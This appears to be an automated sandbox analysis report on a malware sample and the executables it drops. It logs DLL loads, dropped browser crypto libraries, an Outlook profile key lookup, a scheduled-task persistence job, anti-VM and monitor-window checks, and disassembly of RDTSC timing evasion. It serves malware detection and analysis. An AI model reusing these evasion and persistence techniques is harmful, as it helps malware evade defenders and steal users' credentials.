                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: file.exeStatic file information: File size 2544640 > 1048576
                        Source: file.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x22a000
                        Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                        Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                        Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                        Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4b0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeUnpacked PE file: 5.2.JJEGIJEGDB.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 8.2.explorti.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 9.2.explorti.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 12.2.explorti.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C65C410 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_6C65C410
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .data
                        Source: explorti.exe.5.drStatic PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
                        Source: file.exeStatic PE information: real checksum: 0x0 should be: 0x27638e
                        Source: amadka[1].exe.0.drStatic PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: ohmzqnep
                        Source: amadka[1].exe.0.drStatic PE information: section name: ebipawoj
                        Source: amadka[1].exe.0.drStatic PE information: section name: .taggant
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name:
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name: .idata
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name:
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name: ohmzqnep
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name: ebipawoj
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name: .taggant
                        Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                        Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                        Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                        Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                        Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                        Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                        Source: explorti.exe.5.drStatic PE information: section name:
                        Source: explorti.exe.5.drStatic PE information: section name: .idata
                        Source: explorti.exe.5.drStatic PE information: section name:
                        Source: explorti.exe.5.drStatic PE information: section name: ohmzqnep
                        Source: explorti.exe.5.drStatic PE information: section name: ebipawoj
                        Source: explorti.exe.5.drStatic PE information: section name: .taggant
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C62B536 push ecx; ret 0_2_6C62B549
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_001AD82C push ecx; ret 12_2_001AD83F
                        Source: file.exeStatic PE information: section name: entropy: 7.995466725480933
                        Source: file.exeStatic PE information: section name: entropy: 7.977842582826075
                        Source: file.exeStatic PE information: section name: entropy: 7.9508605124369
                        Source: amadka[1].exe.0.drStatic PE information: section name: entropy: 7.987398323235003
                        Source: amadka[1].exe.0.drStatic PE information: section name: ohmzqnep entropy: 7.952574384600115
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name: entropy: 7.987398323235003
                        Source: JJEGIJEGDB.exe.0.drStatic PE information: section name: ohmzqnep entropy: 7.952574384600115
                        Source: explorti.exe.5.drStatic PE information: section name: entropy: 7.987398323235003
                        Source: explorti.exe.5.drStatic PE information: section name: ohmzqnep entropy: 7.952574384600115
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6555F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6C6555F0
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: A7EE45 second address: A7E700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F34D94219DCh 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F34D94219DEh 0x00000012 push dword ptr [ebp+122D0019h] 0x00000018 or dword ptr [ebp+122D1870h], ebx 0x0000001e call dword ptr [ebp+122D265Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1870h], esi 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D2154h], ebx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 jmp 00007F34D94219E9h 0x0000003c mov dword ptr [ebp+122D33DDh], eax 0x00000042 pushad 0x00000043 xor dl, FFFFFFB5h 0x00000046 jmp 00007F34D94219DCh 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2154h], edx 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jne 00007F34D94219DCh 0x00000061 lodsw 0x00000063 je 00007F34D94219DDh 0x00000069 jnc 00007F34D94219D7h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 add dword ptr [ebp+122D2154h], eax 0x0000007a adc ch, FFFFFFBCh 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 jmp 00007F34D94219E3h 0x00000089 push eax 0x0000008a jng 00007F34D94219E8h 0x00000090 push eax 0x00000091 push edx 0x00000092 je 00007F34D94219D6h 0x00000098 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEB0F9 second address: BEB0FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEB639 second address: BEB646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F34D94219D8h 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEB804 second address: BEB80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEB933 second address: BEB93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEB93D second address: BEB941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEDF7F second address: BEE00A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F34D94219DAh 0x00000010 jnp 00007F34D94219D6h 0x00000016 popad 0x00000017 popad 0x00000018 add dword ptr [esp], 4985A972h 0x0000001f sbb edi, 127BE68Ch 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D17BBh], edi 0x0000002c cmc 0x0000002d popad 0x0000002e push 00000003h 0x00000030 add dword ptr [ebp+122D1870h], ecx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F34D94219D8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007F34D94219E2h 0x00000057 push 00000003h 0x00000059 add esi, dword ptr [ebp+122D267Eh] 0x0000005f push 8A6C0093h 0x00000064 push ecx 0x00000065 pushad 0x00000066 jns 00007F34D94219D6h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE106 second address: BEE10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE10A second address: BEE10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: BEE10F second address: BEE11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
